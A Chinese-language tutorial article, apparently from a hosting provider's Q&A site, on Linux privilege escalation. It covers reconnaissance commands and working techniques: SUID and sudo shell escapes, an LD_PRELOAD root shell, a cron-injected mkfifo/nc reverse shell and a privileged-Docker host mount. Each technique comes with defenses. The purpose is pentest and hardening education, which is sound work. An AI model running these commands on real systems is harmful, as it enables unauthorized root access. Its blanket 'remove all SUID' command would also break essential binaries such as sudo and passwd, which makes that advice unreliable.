提权前如何做好信息收集?

在Linux系统中,提权(Privilege Escalation)指用户从普通权限提升至更高权限(如root)的过程。必须强调:未经授权的提权属于违法行为,本文仅用于安全研究、渗透测试或系统防御学习,操作需在合法授权环境下进行。
在尝试提权前,需全面收集系统信息:

  1. 系统版本
    uname -a           # 内核版本
    cat /etc/os-release # 发行版信息
  2. 用户与权限
    id                 # 当前用户权限
    sudo -l            # 检查可用的sudo命令
    cat /etc/passwd    # 用户列表
  3. 敏感文件检查
    find / -perm -4000 -type f 2>/dev/null  # 查找SUID文件
    find / -writable 2>/dev/null            # 全局可写文件
    crontab -l                             # 计划任务

常见提权方法及防御

内核漏洞提权

  • 原理:利用内核未修复的漏洞(如Dirty Pipe、Dirty COW)。
  • 步骤
    # 1. 识别漏洞
    searchsploit "Linux Kernel 5.8"  # 搜索漏洞库
    # 2. 编译并执行EXP(需上传)
    gcc exploit.c -o exploit && ./exploit
  • 防御:定期更新内核(apt upgrade linux-image)。

SUID/SGID滥用

  • 原理:SUID文件以所有者权限运行(如/bin/passwd)。
  • 利用步骤
    # 查找危险SUID文件(如find、vim、bash)
    find / -perm -u=s -type f 2>/dev/null
    # 利用find提权示例:
    touch /tmp/root_shell
    find /tmp/root_shell -exec /bin/sh \;
  • 防御:限制SUID文件(chmod u-s /path/to/file)。

Sudo配置漏洞

  • 原理/etc/sudoers配置错误允许执行危险命令。
  • 利用示例
    # 若允许sudo执行vim:
    sudo vim -c ':!/bin/sh'
    # 若允许sudo执行环境变量(env_keep+LD_PRELOAD):
    echo 'int main(){setgid(0);setuid(0);system("/bin/sh");}' > /tmp/privesc.c
    gcc -fPIC -shared -o /tmp/privesc.so /tmp/privesc.c
    sudo LD_PRELOAD=/tmp/privesc.so <允许的命令>
  • 防御:审计sudo规则(visudo),避免通配符滥用。

计划任务(Cron Jobs)

  • 原理:利用全局可写的计划任务脚本。
  • 步骤
    # 1. 查找可写Cron任务
    ls -la /etc/cron* /var/spool/cron
    # 2. 向脚本注入反向Shell
    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f" >> /path/to/writable_script.sh
  • 防御:限制Cron文件权限(chmod 600),避免路径劫持。

环境变量劫持(PATH)

  • 原理:劫持PATH中的程序路径。
  • 示例
    # 若程序调用相对命令(如"service")
    echo "/bin/sh" > /tmp/service
    chmod +x /tmp/service
    export PATH=/tmp:$PATH
    # 等待SUID程序调用"service"
  • 防御:程序使用绝对路径,用户PATH规范化。

服务提权(Systemd/Docker)

  • 原理:滥用服务权限或容器逃逸。
  • 方法
    • 服务配置错误:修改可写的服务文件(/etc/systemd/system/),重启后生效。
    • Docker逃逸:若在容器内且以--privileged运行,尝试挂载宿主机磁盘:
      mkdir /mnt/host
      mount /dev/sda1 /mnt/host   # 挂载宿主机根目录
      chroot /mnt/host /bin/bash
  • 防御:限制服务文件权限,避免容器特权模式。

自动化工具辅助

  • 信息收集
    • LinPEAS:自动扫描常见提权路径。
    • LinEnum:快速检测系统配置风险。
  • 漏洞利用
    • Linux Exploit Suggester:匹配内核漏洞。

防御建议

  1. 最小权限原则:用户和服务按需分配权限。
  2. 定期更新:及时修补内核及软件(apt update && apt upgrade)。
  3. 审计配置
    • 清理无用SUID文件:find / -perm -4000 -exec chmod u-s {} \;
    • 限制sudo权限:visudo中移除不必要的NOPASSWD
  4. 监控日志:分析/var/log/auth.log/var/log/syslog

法律与道德声明

  • 合法授权:提权操作仅限渗透测试或自有系统,严禁非法入侵
  • 风险自担:未经授权的提权可能导致法律诉讼及系统崩溃。
  • 防御优先:本文旨在帮助管理员加固系统,非攻击教程。

引用说明
本文参考了OWASP权限提升指南、Linux手册页及GTFOBins(SUID利用库),工具来源GitHub官方仓库,遵循各自开源协议。

原创文章,发布者:酷番叔,转转请注明出处:https://cloud.kd.cn/ask/4479.html

(0)
酷番叔酷番叔
上一篇 2025年6月14日 15:44
下一篇 2025年6月14日 16:25

相关推荐

  • linux如何挂载usb

    lsblk或fdisk -l查看USB设备,创建挂载点

    2025年8月16日
    9300
  • Linux如何查看以太网接口状态与配置信息?

    在Linux系统中,以太网作为最基础的网络连接方式,其状态和信息的查看是日常运维和故障排查的重要环节,无论是确认网络接口是否正常、获取IP地址信息,还是排查链路故障、检查硬件参数,都需要掌握多种查看方法,本文将详细介绍Linux系统中查看以太网信息的常用命令、工具及文件,涵盖从基础状态到硬件参数的全方位内容,使……

    2025年10月7日
    9900
  • 给电脑安装Linux系统时,如何备份原系统以防数据丢失?

    安装Linux系统前对电脑数据进行备份是避免数据丢失的关键步骤,无论是替换原有操作系统还是双系统安装,都可能因操作失误导致分区格式化或文件损坏,系统备份不仅能保障个人数据安全,还能在系统故障时快速恢复工作环境,本文将详细讲解安装Linux前的系统备份流程及安装后的系统备份方法,帮助用户顺利完成系统迁移与数据保护……

    2025年9月19日
    10300
  • Linux无图形桌面如何上网?

    Linux无图形桌面环境下,网络配置与管理需通过命令行工具完成,常见于服务器运维、开发环境部署等场景,本文将详细介绍有线/无线网络连接、静态IP配置、代理设置、连通性测试及故障排查等核心操作,帮助用户高效实现无图形界面的网络管理,有线网络配置查看网卡状态使用ip命令(现代Linux发行版推荐,已替代传统ifco……

    2025年8月26日
    12000
  • 如何在linux上删除文件

    Linux上删除文件,可使用rm命令,如“rm 文件名

    2025年8月19日
    14300

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

联系我们

400-880-8834

在线咨询: QQ交谈

邮件:HI@E.KD.CN

关注微信